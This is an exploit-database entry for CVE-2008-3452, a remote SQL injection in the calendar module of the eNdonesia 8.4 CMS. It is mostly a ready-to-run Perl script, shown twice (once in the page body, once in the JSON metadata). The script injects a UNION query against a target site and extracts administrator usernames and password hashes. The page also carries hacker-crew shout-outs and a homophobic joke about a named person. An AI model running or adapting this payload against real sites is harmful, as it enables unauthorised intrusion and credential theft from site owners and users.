Search...

eNdonesia 8.4 Calendar Module Remote SQL Injection Exploit

2008-07-30T00:00:00

ID EDB-ID:6171
Type exploitdb
Reporter Jack
Modified 2008-07-30T00:00:00

Description

eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit. CVE-2008-3452. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl
#/-----------------------------------------------\
#|  /-----------------------------------------\  |
#|  |  Remote SQL Exploit                     |  |
#|  |  eNdonesia 8.4 Remote SQL Exploit       |  |
#|  |  www.endonesia.org                      |  |
#|  |  Calendar Module                        |  |
#|  \-----------------------------------------/  |
#|  /-----------------------------------------\  |
#|  |  Presented By Jack                      |  |
#|  |  MainHack Enterprise                    |  |
#|  |  www.MainHack.com & irc.nob0dy.net      |  | 
#|  |  #MainHack #nob0dy #BaliemHackerlink    |  |
#|  |  Jack[at]MainHack[dot]com               |  |
#|  \-----------------------------------------/  |
#|  /-----------------------------------------\  |
#|  |  Hello To: Indonesian h4x0r             |  |
#|  |  yadoy666,n0c0py & okedeh               |  |
#|  |  VOP Crew [Vaksin13,OoN_BoY,Paman]      |  |
#|  |  NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull  |  |
#|  |  all MainHack BrotherHood               |  |
#|  \-----------------------------------------/  |
#\-----------------------------------------------/
 
  use HTTP::Request;
  use LWP::UserAgent;

  $sql_vulnerable = "/mod.php?mod=calendar&op=list_events&loc_id=";
  $sql_injection  = "-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd";

  if(!@ARGV) { &help;exit(1);}

  sub help(){
       print "\n [?] eNdonesia 8.4 Remote SQL Exploit\n";
       print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
       print " [?] Use : perl $0 www.target.com\n";
       print " [?] Dont use \"http://\"\n";                                                                                    
       print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
       print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood \n\n";
       print " [?] www.MainHack.com\n\n";
  }

  while (){
      my $target    = $ARGV[0];
       my $exploit   = "http://".$target.$sql_vulnerable.$sql_injection;
       print "\n [-] Trying to inject $target ...\n\n";
       my $request   = HTTP::Request-&gt;new(GET=&gt;$exploit);
       my $useragent = LWP::UserAgent-&gt;new();
       $useragent-&gt;timeout(10);
       my $response   = $useragent-&gt;request($request);
       if ($response-&gt;is_success){
               my $res = $response-&gt;content;
               if ($res =~ m/\&gt;([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {
                       my ($username,$passwd) = ($1,$2);
                       print " [target] $target \n";
                       print " [loginx] $username:$passwd \n\n";
                       exit(0);
               }
               else {
                       die " [error] Fail to get username and password.\n\n";
               }
       }
       else {
               die " [error] Fail to inject $target \n\n";
       }
  }

#/----------------------------------------------------------------\
#|  NoGay kalo kita artikan sepintas berarti Tidak ada Gay        |
#|  namun mari kita perhatikan secara seksama ...                 |
#|  NoGay merupakan kependekan dari NoGe is Gay.                  |
#|  Sungguh, penyembunyian sebuah karakter di balik makna kata.   |
#\----------------------------------------------------------------/
#Vendor Has been contacted and now working for it.

# milw0rm.com [2008-07-30]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:6171", "hash": "25c300129114b681c7ab84cc9895d084", "type": "exploitdb", "bulletinFamily": "exploit", "title": "eNdonesia 8.4 Calendar Module Remote SQL Injection Exploit", "description": "eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit. CVE-2008-3452. Webapps exploit for php platform", "published": "2008-07-30T00:00:00", "modified": "2008-07-30T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6171/", "reporter": "Jack", "references": [], "cvelist": ["CVE-2008-3452"], "lastseen": "2016-01-31T23:21:56", "history": [], "viewCount": 2, "enchantments": {"score": {"value": 7.3, "vector": "NONE", "modified": "2016-01-31T23:21:56"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3452"]}], "modified": "2016-01-31T23:21:56"}, "vulnersScore": 7.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6171/", "sourceData": "#!/usr/bin/perl\n#/-----------------------------------------------\\\n#| /-----------------------------------------\\ |\n#| | Remote SQL Exploit | |\n#| | eNdonesia 8.4 Remote SQL Exploit | |\n#| | www.endonesia.org | |\n#| | Calendar Module | |\n#| \\-----------------------------------------/ |\n#| /-----------------------------------------\\ |\n#| | Presented By Jack | |\n#| | MainHack Enterprise | |\n#| | www.MainHack.com & irc.nob0dy.net | | \n#| | #MainHack #nob0dy #BaliemHackerlink | |\n#| | Jack[at]MainHack[dot]com | |\n#| \\-----------------------------------------/ |\n#| /-----------------------------------------\\ |\n#| | Hello To: Indonesian h4x0r | |\n#| | yadoy666,n0c0py & okedeh | |\n#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |\n#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |\n#| | all MainHack BrotherHood | |\n#| \\-----------------------------------------/ |\n#\\-----------------------------------------------/\n \n use HTTP::Request;\n use LWP::UserAgent;\n\n $sql_vulnerable = \"/mod.php?mod=calendar&op=list_events&loc_id=\";\n $sql_injection = \"-999/**/union+select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where%20name%20pwd\";\n\n if(!@ARGV) { &help;exit(1);}\n\n sub help(){\n print \"\\n [?] eNdonesia 8.4 Remote SQL Exploit\\n\";\n print \" [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\\n\";\n print \" [?] Use : perl $0 www.target.com\\n\";\n print \" [?] Dont use \\\"http://\\\"\\n\"; \n print \" [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\\n\";\n print \" [?] Baliem Hacker - VOP crew - MainHack BrotherHood \\n\\n\";\n print \" [?] www.MainHack.com\\n\\n\";\n }\n\n while (){\n my $target = $ARGV[0];\n my $exploit = \"http://\".$target.$sql_vulnerable.$sql_injection;\n print \"\\n [-] Trying to inject $target ...\\n\\n\";\n my $request = HTTP::Request->new(GET=>$exploit);\n my $useragent = LWP::UserAgent->new();\n $useragent->timeout(10);\n my $response = $useragent->request($request);\n if ($response->is_success){\n my $res = $response->content;\n if ($res =~ m/\\>([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {\n my ($username,$passwd) = ($1,$2);\n print \" [target] $target \\n\";\n print \" [loginx] $username:$passwd \\n\\n\";\n exit(0);\n }\n else {\n die \" [error] Fail to get username and password.\\n\\n\";\n }\n }\n else {\n die \" [error] Fail to inject $target \\n\\n\";\n }\n }\n\n#/----------------------------------------------------------------\\\n#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |\n#| namun mari kita perhatikan secara seksama ... |\n#| NoGay merupakan kependekan dari NoGe is Gay. |\n#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |\n#\\----------------------------------------------------------------/\n#Vendor Has been contacted and now working for it.\n\n# milw0rm.com [2008-07-30]\n", "osvdbidlist": ["47355"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}